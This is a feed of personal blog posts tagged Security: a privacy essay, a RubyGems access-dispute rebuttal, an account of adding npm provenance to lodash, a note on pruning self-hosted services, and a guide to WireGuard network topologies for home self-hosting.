Posts in Security (20 found)
ava's blog 2 days ago

how can we (re)teach the importance of privacy?

A few days ago, a Twitch livestreamer streamed herself giving birth. As others sat on a sofa on the left filming and making content about it, you got to see her on the right in a tub, pushing, the more intimate parts turned away from the camera. In the background was a TV displaying the Twitch chat. I'm not here to comment on this decision directly, as she and the people involved have to make that decision and be comfortable with it moving forward, but it did make me think - we must be living through the least privacy-conscious time right now, huh? Maybe it is not even about being conscious of privacy; it's the growing devaluation of it. It goes a little deeper than just misguided retorts like "But I have nothing to hide!".

Ideas around privacy and data protection tend to overlap. Historically, if you wanted to keep something private, you just didn't talk about it, didn't write it down, didn't have it published - but that approach stopped working in the late 1900s. That's when the first data protection laws were created, as more data was recorded via new tech and states were interested in surveying or obtaining said data more or less forcefully. First, there was the Datenschutzgesetz (data protection law) of the state of Hesse in Germany in 1970, which focused a lot on actual data safety. Then closely after, we have Sweden's Datalagen (data act), often mistakenly said to be the first worldwide, which came into effect in 1974. This law was established to regulate the handling of personal data and address Swedish citizens' concerns about privacy in the context of growing data processing technologies.

A very important court decision was the Volkszählungsurteil (Census verdict) of 1983 by the Federal Constitutional Court in Germany. It laid the groundwork for informational self-determination, which means: your right to decide who gets your data, how much, what kind of data, and when. The court held that those who don't know or can't control what information is being stored about their behavior tend to adjust their actions out of caution (also called 'Panopticism'), and that this not only restricts individual freedom, but also harms the common good, because a free and democratic society depends on the self-determined participation of its citizens.

Offense at a census is something we can hardly relate to nowadays, seeing how freely we share all kinds of information online; but back then, the idea of a census was a big deal. We cannot forget that just 40 years prior, that very same country gathered data on Jewish people, Sinti and Roma, disabled people, queer people and others to systematically oppress, torture and kill them. The hesitancy to gather data about specific groups after this ran so deep that it actually had a negative effect: In Germany, it was hard to detect or track the negative effects of thalidomide ('Contergan'), a widely prescribed medication that ended up causing miscarriages and severe disfiguration in babies, because the state did not want to monitor congenital disorders so strictly after the Nazi regime had mandated statistical monitoring under its Law for the Prevention of Hereditarily Diseased Offspring to commit various crimes against disabled people. That delayed making the connection between mothers taking thalidomide and the birth defects, harming more people in the meantime.
As you can see, there used to be a lot of awareness around the risks of data you share and who collects it for what purposes - something that we are increasingly missing nowadays. It's not just that the internet and especially social media has normalized it, but that it also gets rewarded . Back then, what was the expected, foreseeable reward for sharing data with your state for the average person? Absolutely nothing, except for maybe getting punished for it in the future. There was also a culture of stigma and shame around sharing too much of your life. Nowadays though, sharing data freely with all kinds of actors, mostly companies, promises you fame and money - even information around debt, mental health, or a very messy house that people historically would rather die than share. For over two decades now, we have seen countless people have their lives changed by just one viral moment : Paid thousands for videos; book deals, podcast deals, album deals; roles in movies, collaborating with other stars, invited to red carpets and fashion shows; moving into mansions. The viral moment didn't have to be good, it just had to shock. Not sharing your life this intimately, or not sharing data at all, bars you from this completely, but participating is playing the lottery that this might happen to you, too. As living gets more precarious for many, gaming the attention economy is a chance they're willing to take, especially because it doesn't immediately seem like it has any sort of downside. If you win, you win, and if you don't, you don't and just make friends and share things with family and have an archive of your life, right? Obviously, it is not just that. People have had their lives ruined by doxxing , by hacks, by scammers using their own shared information against them. Companies leak data that puts the users at risk of identity fraud , stalkers misuse the trust the users give to them and the platform. People use the media others posted of themselves against their consent to create compromising deepfakes . Employers scour the net for your personal information before hiring you, and people might find out where you work and message your workplace to get you fired. States descend into authoritarian regimes and fascism , using what you have said online to persecute you. Unfortunately, users think all of this only ever happens to other people and is therefore not something they should keep in mind and consider while making accounts and posting. In their eyes, the victims have brought this on themselves, live in 'bad' countries, or had bad luck, and any measure taken to be more privacy-conscious is seen as completely wasted because of the surveillance device we keep in our pockets. To be clear, I am not saying that we should just shut up online; this very blog is the antithesis to that, and it would be hypocritical. But it has to be said: It is simply important to be aware, make a conscious decision and draw your own boundaries , while considering the worst case scenario. It is also about recognizing when we have been pressured and manipulated into oversharing by companies whose business model depends on it. Charlie White, while talking about the birth livestream, fittingly said the following: "I hate that there has been a complete deterioration of the value of privacy . It seems like people don't want privacy anymore. Like, there is no such thing as a special moment anymore if you can't monetize it and publicly display it . Something like the birth of your child, to me, would be [...] 
something so personal that you wouldn't want just a bunch of strangers peeking in on. [...] To me, this seems like a sign of the times where everything needs to be content-brained, content-oriented. There's really no other reason to be livestreaming the delivery of your child other than the obvious attention it's going to bring with it. To me, that just feels so odd, so [...] dystopian. [...] It turns something as sacred as life entering this world into a monetizable spectacle . An event that tons of people were watch-party-ing like it was a fucking football game. [...] I just think that is so fucking sad, that everything has to be content now. Before that baby can even have its first thought or open its eyes, it's already a piece of content, it's already in the social media chaos, it's already on camera. And to me, that's just crazy, but to many people, it's not. Which to me, that's kind of concerning, because we've deteriorated so much that everything is expected to be content now. " This is perfectly capturing the problem and the general attitude. We are in a culture that has lost the ability to properly assess the risks and draw boundaries in regards to privacy, where everything is content and new extremes need to be reached as viewers become desensitized or tired of the usual content strategy. People increasingly feel the need to go harder, show more, do more , be even more vulnerable to capture their audience or even get noticed, and it shows. We are reaching new levels of self-surveillance by the minute. We surveil not only our selves though, but also expose others , whether it is the people in our lives or simply strangers on the street. Our conflicts with others, or others' helpless, humiliating, embarrassing, weird or dangerous moments are now our content as we lift our phones to film the catastrophes, wars, fights and meltdowns we see. It's hard to draw the line between activism and monetizing crimes against humanity with some of them - is it just posted to create awareness, or also because it is content that will do numbers? There's also another aspect: We are living in more anxious times . The news cycle is constant and global and doomscrolling is common, so we have never been more aware of everything bad that is going on everywhere at the same time. It shows in our actions and mental health, always seeking to reassure and pacify ourselves. Our increasing feeling of being unsafe or our property being in danger is weaponized by companies looking to profit off of it. Don't you wanna see who's outside of your door? How about your driveway and your garden? How about the inside of your house so you can always check what your partner, your children and the pets are doing, or catch a burglar or fire early? Don't you wanna know where your loved ones are at all times? 1 It's giving way to constant control and checking. This has made so many people very comfortable to essentially deliver an almost completely unprotected livestream of their location, themselves, their neighbors, strangers just walking by, delivery personnel, friends and family, and any other guest (like repairmen) in or around their homes. Surveillance has made the switch from being seen as oppressive and overbearing to being basically synonymous with safety, which you can see ripples of in law as we are dealing with the UK's Age Verification Law and the EU's ChatControl . One has passed, one has a surprisingly likely chance to pass compared to the attitude and voting from the prior attempt. 
It's clear something has changed. Recently, I had to argue for or against a law for the collection of IP addresses to fight cybercrime ('data retention' or 'Vorratsdatenspeicherung') for a class in my law degree. We were supplied with, but also had to research, arguments for both sides. Surprisingly, despite good arguments that the whole thing would not even be constitutional, a good number of my peers valued a faux sense of safety over the constitution. One literally said "I would rather sacrifice my freedom than my safety".

So, in this culture, how do we teach people the importance and value of privacy, when becoming a glass citizen 2 is potentially a golden ticket, gives us a sense of safety, and is easier and way more fun in the short term than the alternative? To be honest, I just don't know. I feel like none of the arguments are reaching people anymore. They just don't care. It pales in comparison to other, more immediate concerns in their life, feels futile and touches too much on the few ways they seek relief in life. Being privacy-conscious is seen as if it is taking something away from them instead of giving them something. For some, it seems to be reduced to this one-sided, technical challenge of choosing the right device or OS or browser, which complicates it further. Privacy isn't just turning some trackers off in the settings, it's also you figuratively pulling the blinds shut on your online presence for some moments. I'll leave you with a screenshot that my wife fittingly sent me while I was writing this post.

Sidenote: Should I start taking the difference between hyphens and em dashes seriously? Is it a good time to switch while AI is overusing the em dash? Let me know. I just never cared to select the em dash, as the hyphen was faster.

Published 12 Oct, 2025

1. Even I share my location with my wife and have GPS on some of my belongings. Sure, it is convenient for when I lose it, and it gives me a sense of safety that my wife knows where I am, but I am not naive about the downsides and normalization of more extreme forms. ↩
2. English version of the idea of a 'Gläserner Mensch', a data protection/privacy concept about becoming fully transparent/see-through due to all kinds of surveillance. ↩

0 views
André Arko 4 days ago

The RubyGems “security incident”

Ruby Central posted an extremely concerning “ Incident Response Timeline ” today, in which they make a number of exaggerated or purely misleading claims. Here’s my effort to set the record straight. First, and most importantly: I was a primary operator of RubyGems.org, securely and successfully, for over ten years. Ruby Central does not accuse me of any harms or damages in their post, in fact stating “we have no evidence to indicate that any RubyGems.org data was copied or retained by unauthorized parties, including Mr. Arko.” The actions I took during a time of great confusion and uncertainty (created by Ruby Central!) were careful, specific, and aimed to defend both Ruby Central the organization and RubyGems.org the service from potential threats. The majority of the team, including developers in the middle of paid full-time work for Ruby Central, had just had all of their permissions on GitHub revoked. And then restored six days later. And then revoked again the next day. Even after the second mass-deletion of team permissions, Marty Haught sent an email to the team within minutes, at 12:47pm PDT, saying he was (direct quote) “terribly sorry” and “I messed up”. Update : Added email timestamp. The erratic and contradictory communication supplied by Marty Haught, and the complete silence from Shan and the board, made it impossible to tell exactly who had been authorized to take what actions. As this situation occurred, I was the primary on-call. My contractual, paid responsibility to Ruby Central was to defend the RubyGems.org service against potential threats. Marty’s final email clearly stated “I’ll follow up more on this and engage with the governance rfc in good faith.”. Just a few minutes after that email, at 1:01pm PDT, Marty also posted a public GitHub comment , where he agreed to participate in the proposed governance process and stated “I’m committed to find the right governance model that works for us all. More to come.” Update : screenshot of comment removed and replaced with link, since the comment appears to still be visible (at least to logged out users) on GitHub. Given Marty’s claims, the sudden permission deletions made no sense. Worried about the possibility of hacked accounts or some sort of social engineering, I took action as the primary on-call engineer to lock down the AWS account and prevent any actions by possible attackers. I did not change the email addresses on any accounts, leaving them all owned by a team-shared email at rubycentral.org, to ensure the organization retained overall control of the accounts, even if individuals were somehow taking unauthorized actions. Within a couple of days, Ruby Central made an (unsigned) public statement, and various board members agreed to talk directly to maintainers. At that point, I realized that what I thought might have been a malicious takeover was both legitimate and deliberate, and Marty would never “fix the permissions structure”, or “follow up more” as he said. Once I understood the situation, I backed off to let Ruby Central take care of their “security audit”. I left all accounts in a state where they could recover access. I did not alter, or try to alter, anything in the Ruby Central systems or GitHub repository after that. I was confident, at the time, that Ruby Central’s security experts would quickly remove all outside access. My confidence was sorely misplaced. Almost two weeks later, someone asked if I still had access and I discovered (to my great alarm), that Ruby Central’s “security audit” had failed. 
Ruby Central also had not removed me as an “owner” of the Ruby Central GitHub Organization. They also had not rotated any of the credentials shared across the operational team using the RubyGems 1Password account. I believe Ruby Central confused themselves into thinking the “Ruby Central” 1Password account was used by operators, and they did revoke my access there. However, that 1Password account was not used by the open source team of RubyGems.org service operators. Instead, we used the “RubyGems” 1Password account, which was full of operational credentials. Ruby Central did not remove me from the “RubyGems” 1Password account, even as of today. Aware that I needed to disclose this surprising access, but also aware that it was impossible for anyone except former operators to exploit this security failure, I immediately wrote an email to Ruby Central to disclose the problem. Here is a copy of my disclosure email, in full. Ruby Central did not reply to this email for over three days. When they finally did reply, they seem to have developed some sort of theory that I was interested in “access to PII”, which is entirely false. I have no interest in any PII, commercially or otherwise . As my private email published by Ruby Central demonstrates, my entire proposal was based solely on company-level information, with no information about individuals included in any way. Here’s their response, over three days later. In addition to ignoring the (huge) question of how Ruby Central failed to secure their AWS Root credentials for almost two weeks, and appearing to only be aware of it because I reported it to them , their reply also failed to ask whether any other shared credentials might still be valid. There were more. Unbeknownst to me, while I was answering Marty’s email in good faith, Ruby Central’s attorney was sending my lawyer a letter alleging I had committed a federal crime, on the theory that I had “hacked” Ruby Central’s AWS account. On the contrary, my actions were taken in defense of the service that Ruby Central was paying me to support and defend. With my side of the story told, I’ll leave it to you to decide whether you think it’s true that “Ruby Central remains committed to transparent, responsible stewardship of the RubyGems infrastructure and to maintaining the security and trust that the Ruby ecosystem depends on.”

1 views
crtns 1 week ago

On Being Blocked From Contributing to lodash

My Github account was blocked from contributing security improvements to the lodash project. This was my first open source work in a while, and unfortunately, it appears it was a waste of time. That said, I did learn a few lessons about contributing to open source projects that others might benefit from.

I've been going down a rabbit hole to figure out how to improve supply chain security in the JavaScript ecosystem. A common problem is the inability to trust the true origin of code within a package and how that package was built and published. Phishing attacks on npm registry users exploit this weakness - threat actors with stolen credentials will directly publish malicious package versions to the npm registry, bypassing CI/CD entirely. A consumer of the package will be none the wiser; npm will happily install the malicious package version if configured to do so. One way to detect this type of attack is through package provenance. Publishing packages with provenance is the process of creating a signed statement of attestation during the building of a package so that the build process can later be verified. The statement of attestation contains metadata about the build, provided in part by a trusted CI/CD platform, like Github Actions runners. While not a security panacea, dependent projects can check the statement of attestation to detect whether a package was published by a trusted CI/CD process or directly uploaded to the artifact registry, bypassing CI/CD. The npm client itself has made the process of generating and publishing a statement of attestation trivial - all you need is a Github Actions workflow that runs the publish command with the right flags (a sketch of such a workflow appears below). For packages that already use Github as a code forge, adopting a workflow to publish packages with these additional flags is, in most cases, a low-effort task. Despite this, the adoption of package provenance appears abysmally low. Of the ten most popular packages on the npm registry, only two are published with provenance. Even the package is not published with provenance.

I've always felt like an outsider in the world of open source - mostly a consumer, not a contributor. It occurred to me that since I value having npm packages published with provenance, I could be the one to push those PRs. This could be my way of giving something back. Among the top ten packages on npmjs.com without provenance, lodash was the one that caught my eye. I have used lodash many times, both professionally and personally. What stood out specifically about it is that there has not been a new release in over 5 years, but it's still being downloaded tens of millions of times per week. When I went to the Github repo, I saw the main branch had not received a new commit in 9 months. When I checked for a workflow to publish the package, I found nothing. I saw what I thought was a good opportunity. I was certain I could figure out the build process, create a new Github Actions workflow to automatically build lodash, and add provenance to boot. I figured if my initial PR was rejected, I could at least start a conversation about supply chain security and reproducible builds for this very popular project.

Within a few hours, I had a workflow that was mostly working. I reverse-engineered the packaging workflow by digging through git history, reading docs and the wiki. I even managed to publish a forked version of lodash to npmjs with provenance after some trial and error. Unfortunately for me, that trial and error included opening a PR against the lodash repo before I was ready.
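For reference, a publish-with-provenance workflow in its minimal form looks roughly like this. The trigger, Node version, and secret name below are generic placeholders of mine, not anything taken from lodash's actual build setup:

    # .github/workflows/publish.yml -- minimal sketch, placeholder values throughout
    name: Publish to npm with provenance

    on:
      release:
        types: [published]      # placeholder trigger; could also be a tag push

    permissions:
      contents: read
      id-token: write           # lets the runner mint the OIDC token used for the attestation

    jobs:
      publish:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v4
          - uses: actions/setup-node@v4
            with:
              node-version: 20
              registry-url: 'https://registry.npmjs.org'
          - run: npm ci
          - run: npm publish --provenance --access public
            env:
              NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}

On the consuming side, running npm audit signatures in a project will then check that installed packages carry valid registry signatures and attestations.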
I quickly closed the PR because I realized that the build artifacts in my version were not quite a 1-to-1 match with what was in the latest build of lodash. I spent a few more hours in vain trying to figure out how to replicate the build. Eventually, I called it a day and decided to open an issue in the morning to ask the last maintainer who published a build how they managed to generate it. I quickly typed up a Github issue the next morning and pressed "Create". Nothing happened. I looked around and saw an error I had never seen before on Github: "Error - Failed to create the issue." I figured Github was having an outage, so I took a break and did something else. When I tried again though, I saw the same error repeatedly, even after changing the title and content of the issue several times in the off chance I was triggering some kind of blocklist. I decided to try and reproduce the issue in my own repository. No error - I was able to create a Github issue successfully. At this point, I suspected something was up specifically with lodash but I wasn't sure what. I went back to my closed PR on a hunch and noticed some new activity. The PR, despite being already closed, was locked and limited to collaborators. At this point, I was fairly certain I had been blocked. What finally gave it away was when I tried to use the watch action on the lodash Github repo, I got a truly bizarre and nonsensical error - I couldn't watch more than 10,000 repos on Github. I don't even watch 100 repos, and I could watch any other repo I wanted, outside of the lodash organization. In an attempt to reach out to clear up any misunderstandings, I opened a Github issue on my forked repo, tagged the lodash org and primary maintainer, and explained the situation. I gave context as to why I had opened the PR, and what I wanted to achieve. Two weeks later, no response. As a last-ditch effort, I sent an email directly to the same primary maintainer, using an email I found in git commit history, but I have also received no response there either. At this point, I believe I've been permanently blocked. While the effort I ultimately put into this project appears not to have furthered my goals, at least this was a learning experience. My contributions being rejected reinforces a belief I already held before going into this project - open source maintainers don't owe me anything. That said, I'm still confused as to why I was blocked for opening a single PR. I wanted to spark a conversation on how to publish a new version of lodash and ultimately make the build process transparent and trustworthy. I'm genuinely curious if my PR was viewed incorrectly as malicious, or if the maintainer who blocked me simply has no interest in what I was trying to do and is signaling that to the lodash community. When I have time, I will continue to try and add provenance to open source NPM packages where I believe there is value, but I will start slowly and open an issue first to discuss the change. If there's interest, I'll create a pull request. If I'm ignored, I'll move on. My mistake with lodash was jumping in headfirst without gauging the interest of the maintainers or getting a better sense of what was happening in the project. I found out after the fact that the primary maintainer of lodash declared "issue bankruptcy" back in 2023 , closing a slew of open Github issues and starting from scratch, and that a major rewrite of the codebase seems to have stalled out with no progress in 11 months. 
While the CONTRIBUTING.md in the repo indicates "Contributions are always welcome", I mistakenly believed that demonstrating enthusiasm through a pull request was the best way to contribute to open source. I should have known better. As a professional software engineer, I've learned this lesson before: more effort upfront doesn't guarantee results. A five-minute conversation to gauge interest can save hours of work on an unwanted PR.

0 views
Joel Drapper 2 weeks ago

Ruby Central’s “security measures” leave front door wide open

Despite locking maintainers out of

1 views
neilzone 2 weeks ago

I am getting better at turning off unneeded self-hosted services

One of the things at which I’ve become better over the years is turning off self-hosted services. I love self-hosting things, and trying out new things, but I am also mindful that each new thing carries its own set of risks, particularly in terms of security. Similarly, while I do my best to secure servers and services to a reasonable standard, and to isolate things in a sensible way on our network, there is still residual risk and, if I am not using something enough, there is no point in me tolerating that risk. So, once a month, I take a look at what I am self-hosting, and decide (a) if I really still need each thing, and (b) if I do, whether I am doing the thing in the most sensible (for me) way. Occasionally, I am on the fence, particularly if it is something that I use infrequently but do still use. Those are prime candidates for considering if I can achieve the same thing but in a better way. This is particularly true of services where upgrading them is a bit of a pain - I automate as much as I can, but if I have to interfere with something manually, then it is a greater risk, and I am less likely to keep it around. Overall, though, I’ve become a bit more ruthless in taking things down. I have backups, and, if I take down something which I later decide that I want to use, I can always reinstall it and restore the backup. I also go through and remove the DNS entries, and any firewall configuration, and again I have backups of those. I get the benefit of trying new things, but in a more managed manner.

1 views
Gabriel Garrido 3 weeks ago

WireGuard topologies for self-hosting at home

I recently migrated my self-hosted services from a VPS (virtual private server) at a remote data center to a physical server at home. This change was motivated by wanting to be in control of the hardware and network where said services run, while trying to keep things as simple as possible. What follows is a walk-through of how I reasoned through different WireGuard topologies for the VPN (virtual private network) in which my devices and services reside.

Before starting, it’s worth emphasizing that using WireGuard (or a VPN altogether) is not strictly required for self-hosting. WireGuard implies one more moving part in your system, the cost of which is justified only by what it allows you to do. The constraints that I outline below should provide clarity as to why using WireGuard is appropriate for my needs. It goes without saying that not everyone has the same needs, resources, and threat model, all of which a design should account for. That said, there isn’t anything particularly special about what I’m doing. There is likely enough overlap here for this to be useful to individuals or small to medium-sized organizations looking to host their services. I hope that this review helps others build a better mental model of WireGuard, and the sorts of networks that you can build up to, given practical considerations. Going through this exercise proved to be an excellent learning experience, and that is worthwhile on its own. This post assumes some familiarity with networking. This is a subject in which acronyms are frequently employed, so I’ve made sure to spell these out wherever introduced.

The constraints behind the design of my network can be categorized into first-order and second-order constraints. Deploying WireGuard responds to the first-order constraints, whereas the specifics of how WireGuard is deployed respond to the second-order constraints.

1. There should be no dependencies on services or hardware outside of the physical network. I should be able to connect to my self-hosted services while I’m at home as long as there’s electricity in the house and the hardware involved is operating without problems.
2. Borrow elements of the Zero Trust Architecture where appropriate. Right now that means treating all of my services and devices as resources, securing all communications (i.e. not trusting the underlying network), and enforcing least-privileged access.
3. Provisions made to connect to a device from outside the home network should be secondary and optional. While I do wish to use my services while I’m away, satisfying this should not compromise the fundamental design of my setup. For example, I shouldn’t rely on tunneling services provided by third parties.

Choosing to deploy WireGuard is motivated by constraints two and three. Constraint one is not sufficient on its own to necessitate using WireGuard because everything can run on the local area network (LAN). Once deployed, I should be able to connect all of my devices using hardware, software, and keys that I control within the boundaries of my home office. These devices all exist in the same physical network, but may reside in separate virtual LANs (VLANs) or subnets. Regardless, WireGuard is used to establish secure communications within and across these boundaries, while working in tandem with network and device firewalls for access control. I cannot connect to my home network directly from the wide area network (WAN, e.g. the Internet) because it is behind Carrier-Grade Network Address Translation (CGNAT).
A remote host is added to the WireGuard network to establish connections from outside. This host runs on hardware that I do not control, which goes against the spirit of the first constraint. However, an allowance is made considering that the role of this peer is not load-bearing in the overarching design, and it can be removed from the network as needed. Assuming WireGuard is now inherent in this design, its use should adhere to the following constraints:

- Use WireGuard natively as opposed to software that builds on top of WireGuard. I choose to favor simplicity and ease of understanding rather than convenience or added features, ergo, complexity.
- Use of a control plane should not be required. All endpoints are first-class citizens and managed individually, regardless of using a network topology that confers routing responsibilities to a given peer.

Satisfying these constraints precludes the use of solutions such as Tailscale, Headscale, or Netbird. Using WireGuard natively has the added benefit that I can rely on a vetted and stable version as packaged by my Linux distribution of choice, Debian. Lastly, it is worth stating requirements or features that are often found in designs such as these, but that are not currently relevant to me:

- Mesh networking and direct peer-to-peer connections. It’s ok to have peers act as gateways if connections need to be established across different physical or logical networks.
- Prioritizing performance. The size, throughput, and bandwidth of the network is small enough that this is not strictly necessary.
- Automatic discovery or key distribution. It’s ok for nodes in the network to be added or reconfigured manually.

Let’s look at the resources in the network, and how these connect with each other. Consider the following matrix. Each row denotes whether the resource in the first column connects to the resources in the remaining columns, either to consume a service or perform a task. For example, we can tell that the server does not connect to any device, but all devices connect to the server. Said specifically:

- The desktop computer connects to the server to access a calendar, git repositories, etc.
- The tablet connects to the server to download RSS feeds.
- The laptop and desktop connect with each other to sync files.

The purpose of this matrix is to determine which connections between devices ought to be supported, regardless of the network topology. This informs how WireGuard peers are configured, and what sort of firewall rules need to be established. Before proceeding, let’s define the networks and device IP addresses that will be used. The name of the WireGuard network interface will be , where applicable 1 . For purposes of this explanation, port will be used in all of the devices when a port needs to be defined.

I’ll explore different topologies as I build up to the design that I currently employ. By starting with the simplest topology, we can appreciate the benefits and trade-offs involved in each step, while strengthening our conceptual model of WireGuard. Each topology below is accompanied by a simple diagram of the network. In it, the orange arrow denotes a device connecting to another device. Where two devices connect to each other, a bidirectional arrow is employed. Later on, green arrows denote a device forwarding packets to and from other resources.

The basic scenario, and perhaps the most familiar to someone looking to start using WireGuard to self-host at home, is hosting in the network that is established by the router provided by an Internet service provider (ISP). Let’s assume its configuration has not been modified other than changing the Wi-Fi and admin passwords.
A topology that can be used here is point-to-point, where each device lists every other device it connects to as its peer. In WireGuard terminology, “peers” are endpoints configured to connect with each other to establish an encrypted “tunnel” through which packets are sent and received. According to the connections matrix, the desktop computer and the server are peers, but the desktop computer and tablet aren’t. The WireGuard configuration for the desktop computer is sketched a little further below with placeholder values. Note that the LAN IP address of each peer is specified under Endpoint. This is used to find the peer’s device and establish the WireGuard tunnel. AllowedIPs specifies the IP addresses used within the WireGuard network. In other words, the phone is the desktop’s peer, and it can be found at its LAN address to establish the tunnel. Let’s assume each of these devices has a firewall that allows UDP traffic in through the WireGuard port and all subsequent traffic through the WireGuard interface. Once the WireGuard configurations of the server, laptop, and phone include the corresponding peers, secure communication is established through the WireGuard network interface. Let’s try sending a packet from the desktop computer to the phone. The packet was routed directly to the phone and echoed back. At this point access control is enforced in each device’s firewall. Allowing everything that comes through the interface is convenient, but it should be limited to the relevant ports and protocols for least-privileged access.

An obvious problem with this scenario is that the Dynamic Host Configuration Protocol (DHCP) server in the router likely allocates IP addresses dynamically when devices connect to the LAN network. The IP address for a device may thus change over time, and WireGuard will be unable to find a peer to establish a connection to it. For example, I’m at home and my phone dies. The LAN IP address is freed and assigned to another device that comes online. WireGuard will attempt to connect to that address (per the peer’s Endpoint) and fail for any of the following reasons:

- Said device is not running WireGuard
- Said device is using a different address or port, in which case the peer’s Endpoint does not match
- Said device is using a different key, in which case the peer’s PublicKey does not match

Fortunately, most routers support configuring static IP addresses for a given device in the network. Doing so for all devices in our WireGuard network fixes this problem, as the IP address used in Endpoint will be reserved accordingly.

Suppose I want to work at a coffee shop, but still need access to something that’s hosted on my home server. As mentioned in the constraints, my home network is behind CGNAT. This means that I cannot connect directly to it using whatever WAN IP address my router is using at the moment. What I can do instead is use a device that has a publicly routable IP address and make that a WireGuard peer of our server. In this case that’ll be a VPS in some data center. How is the packet ultimately relayed to and from the server at home? Both the server and laptop establish direct encrypted tunnels with the VPS. WireGuard on the VPS will receive the encrypted packets from the laptop, decrypt them, and notice that they’re meant for the server. It will then encrypt these packets with the server’s key and send them through the server’s tunnel. It’ll do the same thing with the server’s response, except towards the laptop using the laptop’s tunnel. A device that forwards packets between peers needs to be configured for IPv4 packet forwarding. I will not cover the specifics of this configuration because it depends on what operating system and firewall are used 2 . The VPS has a publicly routable IP address, and it also gets its own address within the WireGuard network.
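Backing up for a moment, here is roughly what that point-to-point configuration on the desktop could look like. The interface name (wg0), the listen port (51820), and all addresses below are illustrative placeholders rather than the real values in my network:

    # /etc/wireguard/wg0.conf on the desktop (point-to-point; placeholder values)
    [Interface]
    Address    = 10.10.0.2/24            # desktop's address inside the WireGuard network
    PrivateKey = <desktop-private-key>
    ListenPort = 51820

    [Peer]
    # the home server
    PublicKey  = <server-public-key>
    Endpoint   = 192.168.1.10:51820      # the server's (static) LAN address
    AllowedIPs = 10.10.0.1/32            # the server's WireGuard address

    [Peer]
    # the phone
    PublicKey  = <phone-public-key>
    Endpoint   = 192.168.1.11:51820
    AllowedIPs = 10.10.0.3/32

The server, laptop, and phone mirror this with their own [Peer] blocks for each device they talk to.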
The laptop and server are listed as peers in its WireGuard configuration. Note that Endpoint is omitted for each peer. The publicly routable IP addresses of the laptop and the home router are not known to us. Even if they were, they cannot be reached by the VPS. However, they will be known to the VPS when these connect to it. Now, the server at home adds the VPS as its peer, using the VPS public IP address as its Endpoint. We also make use of PersistentKeepalive to send an empty packet every 25 seconds. This is done to establish the tunnel ahead of time, and to keep it open. This is necessary because otherwise the tunnel may not exist when I’m at the coffee shop trying to access the server at home. Remember, the VPS doesn’t know how to reach the server unless the server is connected to it.

Let’s take a careful look at the laptop’s configuration, and what we’re looking to achieve. When the laptop is at home, it connects to the server using an endpoint address that is routable within the home LAN network. This endpoint address is not routable when I’m outside, in which case I want the connection to go through the VPS. To achieve this, the laptop maintains two mutually exclusive WireGuard interfaces: a home interface and an away interface. The former is active only while I’m in the home network, and the latter while I’m on the go. Unlike the server, the VPS does not need to be added as a peer to the laptop’s home interface because it doesn’t need to connect to it while at home. Instead, the VPS is added to the away interface’s configuration (sketched below). The Interface section of both is mostly the same. The laptop should have the same address and key, regardless of where it is. Only ListenPort is omitted in the away interface because no other device will look to connect to it, in which case we can have WireGuard set a port dynamically. What differs is the peer configuration. In the away interface, the VPS is set as the only peer. However, the home server’s IP address is added to the VPS peer’s list of AllowedIPs. WireGuard uses this information to route any packets for the VPS or the server through the VPS. Unlike the server’s peer configuration for the VPS, PersistentKeepalive is not needed because the laptop is always the one initiating the tunnel when it reaches out to the server. We can verify that packets are being routed appropriately to the server through the VPS.

We solved for outside connectivity using a network topology called hub-and-spoke. The laptop and home server are not connecting point-to-point. The VPS acts as a hub or gateway through which connections among members of the network (i.e. the spokes) are routed. If we scope down our network to just the laptop and the home server, we see how this hub is not only a peer of every spoke, but also just its only peer. Yet, how exactly is the packet routed back to the laptop? Mind you, at home the laptop is a peer of the server. When the server responds to the laptop, it will attempt to route the response directly to the laptop’s peer endpoint. This fails because the laptop is not actually reachable via that direct connection when I’m on the go. This makes the laptop a “roaming client”; it connects to the network from different locations, and its endpoint may change. This all works because the hub has been configured to do Network Address Translation (NAT); it replaces the source address of each packet with its own as it is being forwarded. The spokes accept the packets because they appear to originate from their peer. In other words, when the laptop is reaching out to the home server, the server sees traffic coming from the VPS and returns it there.
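Putting the hub-and-spoke pieces together, the relevant fragments might look like the following. The VPS public address (203.0.113.10), the WireGuard subnet (10.10.0.0/24), and the key names are placeholders of mine, and the three fragments live on three different machines:

    # On the VPS (the hub) -- IPv4 forwarding and NAT must also be enabled here
    [Interface]
    Address    = 10.10.0.100/24
    PrivateKey = <vps-private-key>
    ListenPort = 51820

    [Peer]
    # home server: no Endpoint, it dials in and keeps the tunnel alive
    PublicKey  = <server-public-key>
    AllowedIPs = 10.10.0.1/32

    [Peer]
    # laptop (roaming client)
    PublicKey  = <laptop-public-key>
    AllowedIPs = 10.10.0.4/32

    # On the home server: an extra [Peer] block for the VPS
    [Peer]
    PublicKey           = <vps-public-key>
    Endpoint            = 203.0.113.10:51820
    AllowedIPs          = 10.10.0.100/32
    PersistentKeepalive = 25              # establish the tunnel ahead of time and keep it open

    # On the laptop, the "away" interface: the VPS is the only peer,
    # but the home server is routed through it
    [Interface]
    Address    = 10.10.0.4/24
    PrivateKey = <laptop-private-key>
    # no ListenPort: nothing ever initiates a connection to the laptop

    [Peer]
    PublicKey  = <vps-public-key>
    Endpoint   = 203.0.113.10:51820
    AllowedIPs = 10.10.0.100/32, 10.10.0.1/32   # the VPS and the home server

A quick way to check this from outside is to bring up the away interface, ping the server's WireGuard address, and look at the latest handshakes with wg show.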
The hub is forwarding packets among the spokes without regard to access control. Thus, its firewall should be configured for least-privilege access. For example, if the laptop is only accessing git repositories in the home server over SSH, then the hub firewall should only allow forwarding from the laptop’s peer connection to the home server’s IP address and SSH port. Let’s iterate. If I now wish to sync my laptop with my desktop computer from outside the network, I would be adding yet another spoke to this hub. The desktop computer and the VPS configure each other as peers, while the desktop’s IP address is included in the VPS peer’s AllowedIPs in the laptop’s configuration.

